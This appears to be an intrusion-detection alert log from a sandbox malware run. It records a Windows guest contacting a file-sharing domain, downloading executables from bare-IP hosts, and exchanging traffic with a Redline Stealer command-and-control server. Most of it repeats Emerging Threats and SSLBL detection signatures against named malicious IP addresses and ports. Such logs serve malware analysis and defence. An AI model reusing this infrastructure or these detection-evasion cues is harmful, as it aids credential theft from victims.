TCP 192.168.56.103:49250 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49350 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49350 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49274 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49274 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49218 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49218 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49181 -> 77.91.124.47:80	2017598	ET MALWARE Possible Kelihos.F EXE Download Common Structure	A Network Trojan was detected
TCP 192.168.56.103:49274 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49181 -> 77.91.124.47:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49350 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49218 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49204 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49350 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49204 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49276 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49276 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49219 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49219 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49276 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49356 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49219 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49356 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49207 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49207 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49356 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49279 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49207 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49279 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49244 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49207 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49244 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49279 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49369 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49244 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49369 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49369 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49280 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49209 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49280 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49209 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49245 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49245 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49280 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49209 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49370 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49370 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49252 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49252 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49197 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49370 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49252 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49283 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49283 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49197 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49283 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49371 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 77.91.124.84:19071 -> 192.168.56.103:49197	2046056	ET MALWARE Redline Stealer Activity (Response)	A Network Trojan was detected
TCP 192.168.56.103:49371 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49254 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49254 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49254 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49254 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49245 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49197 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49371 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49197 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49371 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49197 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49229 -> 77.91.124.84:19071	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.103:49197 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49259 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49259 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49374 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49229 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49374 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49229 -> 77.91.124.84:19071	2046045	ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 192.168.56.103:49259 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49197 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 77.91.124.84:19071 -> 192.168.56.103:49229	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.103:49197 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49273 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49273 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49233 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49233 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49296 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49273 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49296 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49233 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49296 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49197 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49374 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49258 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49258 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49234 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49300 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49234 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49258 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49300 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49291 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49234 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49291 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49197 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49300 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49197 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49377 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49377 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49301 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49238 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49301 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49238 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49377 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49301 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49238 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49377 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49197 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49240 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49240 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49316 -> 77.91.68.61:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49240 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49197 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49197 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49197 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49197 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49197 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49197 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49229 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49316 -> 77.91.68.61:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49197 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49229 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49381 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49381 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 77.91.124.84:19071 -> 192.168.56.103:49229	2046056	ET MALWARE Redline Stealer Activity (Response)	A Network Trojan was detected
TCP 192.168.56.103:49381 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49229 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 77.91.68.61:80 -> 192.168.56.103:49316	2014819	ET INFO Packed Executable Download	Misc activity
TCP 192.168.56.103:49229 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49229 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49387 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49387 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49255 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49387 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49255 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49255 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49229 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49404 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49255 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49404 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49229 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49321 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49181 -> 77.91.124.47:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.103:49321 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49229 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49229 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49321 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49229 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49229 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49229 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49263 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49263 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49263 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 77.91.68.61:80 -> 192.168.56.103:49316	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.103:49229 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 77.91.68.61:80 -> 192.168.56.103:49316	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.103:49263 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49404 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49229 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49229 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49229 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49229 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49229 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49229 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49412 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49412 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49288 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49412 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49288 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49412 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49288 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49294 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49294 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 77.91.68.61:80 -> 192.168.56.103:49316	2015744	ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)	Misc activity
TCP 192.168.56.103:49294 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49302 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49302 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49302 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49322 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49322 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49414 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49338 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49322 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49338 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49414 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49338 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49414 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49323 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49323 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
